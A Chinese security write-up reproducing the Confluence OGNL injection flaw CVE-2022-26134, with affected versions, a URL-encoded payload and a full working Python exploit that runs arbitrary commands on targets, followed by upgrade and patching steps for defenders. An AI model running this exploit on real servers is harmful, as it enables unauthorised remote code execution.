ATLASSIAN CONFLUENCE 远程代码执行漏洞（CVE-2022-26134）漏洞复现

一、漏洞概述

近日，Atlassian官方发布了Confluence Server和Data Center OGNL 注入漏洞（CVE-2022-26134）的安全公告，远程攻击者在未经身份验证的情况下，可构造OGNL表达式进行注入，实现在Confluence Server或Data Center上执行任意代码，CVSS评分为10。目前该漏洞细节与PoC已被公开披露，且被检测到存在在野利用。请相关用户尽快采取措施进行防护。

Atlassian Confluence是Atlassian公司出品的专业wiki程序。它可以作为一个知识管理的工具，通过它能够实现团队成员之间的协作和知识共享。

二、影响范围

受影响版本

• 1.3.0 <= Confluence Server and Data Center < 7.4.17
• 7.13.0 <= Confluence Server and Data Center < 7.13.7
• 7.14.0 <= Confluence Server and Data Center < 7.14.3
• 7.15.0 <= Confluence Server and Data Center < 7.15.2
• 7.16.0 <= Confluence Server and Data Center < 7.16.4
• 7.17.0 <= Confluence Server and Data Center < 7.17.4
• 7.18.0 <= Confluence Server and Data Center < 7.18.1

不受影响版本

• Confluence Server and Data Center 7.4.17
• Confluence Server and Data Center 7.13.7
• Confluence Server and Data Center 7.14.3
• Confluence Server and Data Center 7.15.2
• Confluence Server and Data Center 7.16.4
• Confluence Server and Data Center 7.17.4
• Confluence Server and Data Center 7.18.1

三、 漏洞检测

使用payload进行检测

payload = "%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22{}%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D".format(command)

poc利用脚本如下:

https://github.com/Nwqda/CVE-2022-26134/blob/master/cve-2022-26134.py

 python代码如下:

# -*- coding: utf-8 -*-

# Author:   Naqwada (RuptureFarm 1029) <[email protected]>
# License:  MIT License (http://www.opensource.org/licenses/mit-license.php)
# Docs:     https://github.com/Naqwa/CVE-2022-26134
# Website:  http://samy.link/
# Linkedin: https://www.linkedin.com/in/samy-younsi/
# Note:     FOR EDUCATIONAL PURPOSE ONLY.

from bs4 import BeautifulSoup
import requests
import urllib3
import re
import sys
urllib3.disable_warnings()

def banner():
  CVE_2022_26134Logo = """
   _______    ________                                
  / ____/ |  / / ____/                                
 / /    | | / / __/                                   
/ /___  | |/ / /___                                   
\____/  |___/_____/___       ___   _____________ __ __
  |__ \ / __ \__ \|__ \     |__ \ / ___<  /__  // // /
  __/ // / / /_/ /__/ /_______/ // __ \/ / /_ </ // /_
 / __// /_/ / __// __/_____/ __// /_/ / /___/ /__  __/
/____/\____/____/____/    /____/\____/_//____/  /_/   
                                                      
                  \033[1;91mCVE-2022-26134 - OGNL injection vulnerability\033[1;m                  
Author: \033[1;92mNaqwada\033[1;m                         
RuptureFarm 1029      
                FOR EDUCATIONAL PURPOSE ONLY.   
  """
  return print('\033[1;94m{}\033[1;m'.format(CVE_2022_26134Logo))

def check_target_version(host):
  try:
    response = requests.get("{}/login.action".format(host), verify=False, timeout=8)
    if response.status_code == 200:
      filter_version = re.findall("<span id='footer-build-information'>.*</span>", response.text)
      
      if len(filter_version) >= 1:
        version = filter_version[0].split("'>")[1].split('</')[0]
        return version
      else:
        return False
    else:
      return host
  except:
    return False

def send_payload(host, command):   
    payload = "%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22{}%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D".format(command)
    response = requests.get("{}/{}/".format(host, payload), verify=False, allow_redirects=False)
    
    try:
      if response.status_code == 302:
          return response.headers["X-Cmd-Response"]
      else:
          return "This target does not seem to be vulnerable."
    except:
      return "This target does not seem to be vulnerable."

def main():
  banner()
  if len(sys.argv) < 3:
    print("\033[1;94mHow to use:\033[1;m")
    print("python3 {} https://target.com cmd".format(sys.argv[0]))
    print("ex: python3 {} https://target.com id".format(sys.argv[0]))
    print("ex: python3 {} https://target.com 'ps aux'".format(sys.argv[0]))
    return
  
  target = sys.argv[1]
  cmd = sys.argv[2]
  version = check_target_version(target)

  if version:
    print("Confluence target version: \033[1;94m{}\033[1;m".format(version))
  else:
    print("Can't find the used version for this target. Is the target offline?")
    return
  
  exec_payload = send_payload(target, cmd) 
  print(exec_payload)

if __name__ == "__main__":
   main()

使用脚本验证存在漏洞的站点,验证成功:

四、漏洞防护

4.1 官方升级

官方建议用户升级至最新版本，以保证服务的安全性及稳定性。下载链接：https://www.atlassian.com/software/confluence/download-archives

可参考下表，升级至对应修复版本：

受影响版本	修复版本
1.3.0 – 7.4.16	7.4.17
7.13.0 – 7.13.6	7.13.7
7.14.0 – 7.14.2	7.14.3
7.15.0 – 7.15.1	7.15.2
7.16.0 – 7.16.3	7.16.4
7.17.0 – 7.17.3	7.17.4
7.18.0	7.18.1

4.2 临时防护措施

若相关用户暂时无法进行升级操作，也可通过以下步骤来缓解该问题：

对于 Confluence 7.15.0 – 7.18.0：

如果在集群中运行 Confluence，则需要在每个节点上重复此过程。您不需要关闭整个集群。

1、关闭 Confluence。

2、下载 xwork-1.0.3-atlassian-10.jar 到Confluence服务器。链接：

https://packages.atlassian.com/maven-internal/opensymphony/xwork/1.0.3-atlassian-10/xwork-1.0.3-atlassian-10.jar

3、将xwork-1.0.3-atlassian-8.jar删除或移出Confluence 安装目录。文件路径：

 <confluence-install>/confluence/WEB-INF/lib/xwork-1.0.3-atlassian-8.jar

注意：请用户不要在该目录中留下旧JAR文件的副本。

4、将下载的xwork-1.0.3-atlassian-10.jar文件复制到以下目录中。目录路径：

<confluence-install>/confluence/WEB-INF/lib/

5、检查xwork-1.0.3-atlassian-10.jar文件权限是否与同一目录中的其他文件相同。

6、重启 Confluence。

请记住，如果您在集群中运行 Confluence，请确保在所有节点上运行此脚本。

对于Confluence 7.0.0 – Confluence 7.14.2：

如果在集群中运行 Confluence，则需要在每个节点上重复此过程。您不需要关闭整个集群。

1、关闭 Confluence。

2、下载 xwork-1.0.3-atlassian-10.jar、webwork-2.1.5-atlassian-4.jar和CachedConfigurationProvider.class 三个文件到 Confluence Windows 服务器。链接分别为：

https://packages.atlassian.com/maven-internal/opensymphony/xwork/1.0.3-atlassian-10/xwork-1.0.3-atlassian-10.jar

https://packages.atlassian.com/maven-internal/opensymphony/webwork/2.1.5-atlassian-4/webwork-2.1.5-atlassian-4.jar

https://confluence.atlassian.com/doc/files/1130377146/1137639562/3/1654274890463/CachedConfigurationProvider.class

3、将xwork-1.0.3.6.jar与webwork-2.1.5-atlassian-3.jar删除或移出Confluence 安装目录。文件路径分别为：

<confluence-install>/confluence/WEB-INF/lib/xwork-1.0.3.6.jar

<confluence-install>/confluence/WEB-INF/lib/webwork-2.1.5-atlassian-3.jar

注意：请用户不要在该目录中留下以上旧JAR文件的副本。

4、将下载的xwork-1.0.3-atlassian-10.jar文件复制到以下目录中。目录路径：

<confluence-install>/confluence/WEB-INF/lib/

5、将下载的webwork-2.1.5-atlassian-4.jar文件复制到以下目录中。目录路径：

<confluence-install>/confluence/WEB-INF/lib/

6、检查下载的新文件权限是否与同一目录中的其他文件相同。

7、切换到以下目录

<confluence-install>/confluence/WEB-INF/classes/com/atlassian/confluence/setup

（1）在setup目录下创建一个名为webwork的新目录

（2）将CachedConfigurationProvider.class复制到创建好的webwork目录中。目录路径：

<confluence-install>/confluence/WEB-INF/classes/com/atlassian/confluence/setup/webwork

（3）检查CachedConfigurationProvider.class文件权限是否与同一目录中的其他文件相同。

8、重启 Confluence。

请记住，如果您在集群中运行 Confluence，请确保在所有节点上运行此脚本。